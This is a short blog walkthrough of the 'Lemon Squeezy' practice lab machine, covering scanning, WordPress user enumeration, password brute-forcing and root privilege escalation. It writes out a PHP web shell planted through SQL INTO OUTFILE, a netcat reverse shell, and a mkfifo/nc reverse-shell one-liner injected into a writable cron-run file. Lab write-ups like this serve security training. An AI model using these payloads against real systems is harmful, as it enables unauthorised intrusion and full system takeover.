Lemon Squeezy Walkthrough

We start scanning the host with nmap –A –T4 –p- –vv

We only have port 80 open so we scan it with dirb

Now we have a WordPress service we can enumerate the usernames with wpscan –url -e u

We got two usernames orange and lemon, now we brute force the username orange with:

wpscan –url -U orange -P /root/pass/rockyou.txt

And we got a password ginger for the user orange, let’s login at http://lemonsqueezy/wordpress/wp-login.php

In the Posts section i found the post with a message “Keep this safe!” and there is some kind of credentials:

Now this password is used to login at with the user orange:

Now we need to upload some sort of shell, notice that we can’t create a new database so we’re going to select the wordpress database and then create a new table with the name hacker:

Click on go and then select SQL and write SELECT “<?php system($_GET[‘cmd’]); ?>” into outfile “/var/www/html/wordpress/shell.php”

Once again click on go and then visit the file on

Now let’s upload a reverse shell with a simple command nc –e /bin/sh 4444

We got a user.txt flag:

I transferred LinEnum.sh script and ran it and i got a file logrotate in the crontab:

Edit the file as it’s writable with a reverse shell script to our machine:

echo “mkfifo /tmp/zfimwap; nc 1234 0</tmp/zfimwap | /bin/sh >/tmp/zfimwap 2>&1; rm /tmp/zfimwap” > logrotate

Now we wait for a little and then we will get a shell back and catch the root flag:

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s